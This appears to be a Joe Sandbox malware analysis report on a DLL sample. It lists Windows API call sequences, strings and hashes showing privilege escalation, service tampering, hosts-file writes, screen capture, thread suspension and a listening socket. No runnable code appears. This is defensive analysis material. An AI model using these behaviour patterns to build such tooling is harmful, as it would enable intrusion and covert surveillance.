                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleepclosesocket$_errnohtonsinet_addrrecvfromselect
                                                  • String ID:
                                                  • API String ID: 1415794423-0
                                                  • Opcode ID: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                  • Instruction ID: 526c464df8ce17cb72c57ff37cbb3dc0b2e5127f8a28d9ed385b909f9f69fec1
                                                  • Opcode Fuzzy Hash: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                  • Instruction Fuzzy Hash: F461A074508381ABD710CF24EC44AABB7F4FFC4714F408A2EF99997250E774D9098B66
                                                  APIs
                                                  • strchr.MSVCRT ref: 10023B29
                                                  • atoi.MSVCRT(?), ref: 10023B56
                                                  • strchr.MSVCRT ref: 10023B98
                                                  • strncpy.MSVCRT ref: 10023BCF
                                                  • strchr.MSVCRT ref: 10023BDB
                                                  • strncpy.MSVCRT ref: 10023C03
                                                  • strncpy.MSVCRT ref: 10023C1F
                                                  • InitializeCriticalSection.KERNEL32(1012C4C8), ref: 10023C86
                                                    • Part of subcall function 10023A10: WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                    • Part of subcall function 10023A10: socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                    • Part of subcall function 10023A10: htons.WS2_32 ref: 10023A68
                                                    • Part of subcall function 10023A10: bind.WS2_32 ref: 10023A83
                                                    • Part of subcall function 10023A10: listen.WS2_32(00000000,00000032), ref: 10023A94
                                                  • WSACleanup.WS2_32 ref: 10023C91
                                                  • DeleteCriticalSection.KERNEL32(1012C4C8), ref: 10023C9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strchrstrncpy$CriticalSection$CleanupDeleteInitializeStartupatoibindhtonslistensocket
                                                  • String ID:
                                                  • API String ID: 2616448033-0
                                                  • Opcode ID: 55b51d6532b0de008f3ed0ddd65bbc0284a31802f93f59684aeb0db7c36dd63e
                                                  • Instruction ID: f0911b4fec8e4266fbad34e6581986e1c1ae1dffaf00490737ab10f6ce092d50
                                                  • Opcode Fuzzy Hash: 55b51d6532b0de008f3ed0ddd65bbc0284a31802f93f59684aeb0db7c36dd63e
                                                  • Instruction Fuzzy Hash: 7541CE365046081BD32C9A789C558BB7BD5FBC4320F554B2EFA2B936D0DEB4AE088694
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                  • String ID:
                                                  • API String ID: 3289936468-0
                                                  • Opcode ID: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                  • Instruction ID: c614f76b29358a3fda3e897671393add0d389b4ba00e88ce342a7451a82b3d62
                                                  • Opcode Fuzzy Hash: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                  • Instruction Fuzzy Hash: 8241E8B4D046559FF721CF188C447AEBBE4FB0A6E0F14066AE8D5A3645C3344A02CFA6
                                                  APIs
                                                  • #540.MFC42 ref: 10011358
                                                  • #858.MFC42(00000004), ref: 10011376
                                                  • #922.MFC42(?,00000000,00000000,?,?,?,?), ref: 100113A9
                                                  • #858.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113B8
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113C6
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113D4
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113E1
                                                  • #939.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011409
                                                  • #800.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011416
                                                  • #535.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011426
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011438
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$#858$#535#540#922#939
                                                  • String ID:
                                                  • API String ID: 1721966335-0
                                                  • Opcode ID: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                  • Instruction ID: 1068962097da1abb9be03f2cf21bec5754a184422a1b80b0b6d5662a040d76a2
                                                  • Opcode Fuzzy Hash: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                  • Instruction Fuzzy Hash: 7D319A79108381ABC305DB68D551F9FBBE9EF98A14F400A1DF49993282DB34E608C767
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000008), ref: 100196A1
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000002), ref: 100196D9
                                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 100196E2
                                                  • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019728
                                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10019733
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019740
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019743
                                                  • Sleep.KERNEL32(000000C8), ref: 1001974A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseDatabaseHandleProcess$ChangeConfigCurrentLockManagerSleepTokenUnlock
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2207141857-2896544425
                                                  • Opcode ID: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                  • Instruction ID: dc65207eb95ef46fdda0787c0b6e18c9b4e2414683cc893defa47448b081054d
                                                  • Opcode Fuzzy Hash: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                  • Instruction Fuzzy Hash: D2213D3925411467E320AB789C4AFEB3B98FB94760F140326FA199B2C1DD74EC448675
                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAA6
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAE3
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAF3
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB0A
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                  • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                  • API String ID: 1069036285-946259135
                                                  • Opcode ID: 3ef40e1b24012dc33a54d2610ee3cd82b13cfcf054cf135e9c6401c4dca04a34
                                                  • Instruction ID: 5292a9c2d9f8cb6fc371b91f45e4bc5e063248a78d6024cb8ab5bb5854198aeb
                                                  • Opcode Fuzzy Hash: 3ef40e1b24012dc33a54d2610ee3cd82b13cfcf054cf135e9c6401c4dca04a34
                                                  • Instruction Fuzzy Hash: FA210731204750AFE310CB68CC95BEBB7D9FB89350F444A2CF649972D0DA755A05CBA2
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10019871
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000034), ref: 100198A9
                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100198B7
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 100198DA
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 100198ED
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FA
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FD
                                                  • Sleep.KERNEL32(000000C8), ref: 10019904
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQuerySleepStartStatusToken
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 3878120848-2896544425
                                                  • Opcode ID: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                  • Instruction ID: 50e31cc6d71f3cb09cdeb76e9080be0a7887b9f28361484d1c1b8db58f74100a
                                                  • Opcode Fuzzy Hash: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                  • Instruction Fuzzy Hash: C721EB352502146BE714EB609C8AFBF77D4FB88350F15061AFA0A9A1C0EEB4AD448665
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 100296A0
                                                  • GetCurrentProcess.KERNEL32(?), ref: 100296AB
                                                  • IsWow64Process.KERNEL32(00000000), ref: 100296B2
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100296FD
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 10029717
                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 1002973C
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029745
                                                  Strings
                                                  • \sysnative\drivers\etc\hosts, xrefs: 100296C2
                                                  • \system32\drivers\etc\hosts, xrefs: 100296C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Process$AttributesCloseCreateCurrentDirectoryHandleWindowsWow64Write
                                                  • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                  • API String ID: 4291671391-1011561390
                                                  • Opcode ID: 2adefefbe028c6965658248b5395f428dfa06602fd6f54fb6328fb5b9b7a67e1
                                                  • Instruction ID: c6005bee7c224514f3309a3699cccf42982a6e54c45629d08b6c9908a2ddda91
                                                  • Opcode Fuzzy Hash: 2adefefbe028c6965658248b5395f428dfa06602fd6f54fb6328fb5b9b7a67e1
                                                  • Instruction Fuzzy Hash: 5B21C5352043056BE324DB78DC49F9B7B98FB84720F144F2CFA96A72D0DAB09D0987A1
                                                  APIs
                                                  • #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                  • #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                  • #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                  • #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                  • #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                  • #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                  • #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                  • #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #3811$#2614#860
                                                  • String ID: *.*
                                                  • API String ID: 4293058641-438819550
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,.23,00000000,?,00000000,10005979,?,?), ref: 100059E4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100059ED
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,00000000,10005979,?,?), ref: 100059FB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100059FE
                                                  • malloc.MSVCRT ref: 10005A1F
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$malloc
                                                  • String ID: .23$KERNEL32.dll$MultiByteToWideChar$lstrlenA
                                                  • API String ID: 1625907898-566195008
                                                  APIs
                                                    • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                    • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                  • GetCursorPos.USER32(?), ref: 10018246
                                                  • GetSystemMetrics.USER32(00000000), ref: 10018255
                                                  • _ftol.MSVCRT ref: 10018273
                                                  • _ftol.MSVCRT ref: 10018288
                                                  • GetCursorInfo.USER32(?,?,00000008), ref: 100182AE
                                                  • DestroyCursor.USER32(?), ref: 100182D9
                                                  • BitBlt.GDI32(?,00000000,00000000,10016B8A,?,?,00000000,00000000,?), ref: 1001831C
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 10018373
                                                  • Sleep.KERNEL32(00000001), ref: 10018393
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 1001839C
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor$CounterPerformanceQuery_ftol$DestroyInfoMetricsReleaseSleepSystem
                                                  • String ID:
                                                  • API String ID: 2306850792-0
                                                  APIs
                                                  • ReleaseDC.USER32(00000000,?), ref: 10018034
                                                  • DeleteDC.GDI32(?), ref: 10018044
                                                  • DeleteDC.GDI32(?), ref: 1001804A
                                                  • DeleteDC.GDI32(?), ref: 10018050
                                                  • DeleteObject.GDI32(?), ref: 1001805C
                                                  • DeleteObject.GDI32(?), ref: 10018062
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018083
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018093
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 100180A3
                                                  • DestroyCursor.USER32(?), ref: 100180C9
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$#825$Object$CursorDestroyRelease
                                                  • String ID:
                                                  • API String ID: 719826280-0
                                                  APIs
                                                    • Part of subcall function 1002BE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                    • Part of subcall function 1002BE50: Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                    • Part of subcall function 1002BE50: _strcmpi.MSVCRT ref: 1002BEA7
                                                    • Part of subcall function 1002BE50: Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                    • Part of subcall function 1002BE50: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1002C3E2
                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1002C3FC
                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1002C422
                                                  • #823.MFC42(?), ref: 1002C42F
                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 1002C451
                                                  • #823.MFC42(00000100), ref: 1002C473
                                                  • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 1002C4A3
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Token$#823InformationOpenProcessProcess32$AccountCloseCreateFirstHandleLookupNextSnapshotToolhelp32_strcmpi
                                                  • String ID: explorer.exe
                                                  • API String ID: 1409679202-3187896405
                                                  APIs
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintfwsprintf$FileModuleName
                                                  • String ID: %s:%d
                                                  • API String ID: 2407558147-1029262843
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026C36
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026C48
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 10026C65
                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 10026C76
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10026C93
                                                  • CloseHandle.KERNEL32(00000000), ref: 10026C9A
                                                  • LocalFree.KERNEL32(?), ref: 10026CCA
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateDirectoryFreeHandleLocalPointerSystemWritelstrcat
                                                  • String ID: p
                                                  • API String ID: 3379061965-2181537457
                                                  APIs
                                                    • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                    • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 100291FA
                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 1002920B
                                                  • OpenThread.KERNEL32(001F03FF,00000000,?,?,?,00000000,0000001C,00000004,00000000), ref: 10029240
                                                  • SuspendThread.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029245
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029248
                                                  • Thread32Next.KERNEL32(00000000,?), ref: 10029254
                                                  • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000004,00000000), ref: 10029260
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextSnapshotSuspendTokenToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 3882456823-2896544425
                                                  APIs
                                                  • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B94
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BA8
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BBB
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeMemory$InformationQuerySession
                                                  • String ID: Console$ICA$RDP
                                                  • API String ID: 2964284127-2419630658
                                                  • Opcode ID: 0b2323dddc9a2d9ea3f3765d10de65ae570c9d2cec0aafa0406f992b21ef4394
                                                  • Instruction ID: 969729b71c1efb95c3881a1fa7dc888f36de69f465288503b8c6abb24bd41a19
                                                  • Opcode Fuzzy Hash: 0b2323dddc9a2d9ea3f3765d10de65ae570c9d2cec0aafa0406f992b21ef4394
                                                  • Instruction Fuzzy Hash: 2E01F5B6618221678504EB9CBC418ABB2F8EB94A55F49442AF948D7200E630ED1CCBF6
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,?), ref: 1002AE32
                                                  • RegQueryValueExA.ADVAPI32(00000050,Favorites,00000000,00000000,00000000,00000050), ref: 1002AE53
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002AE5E
                                                  • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AE6B
                                                    • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                    • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                    • Part of subcall function 1002AB10: FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                  • LocalReAlloc.KERNEL32(?,00000001,00000042), ref: 1002AEA0
                                                  Strings
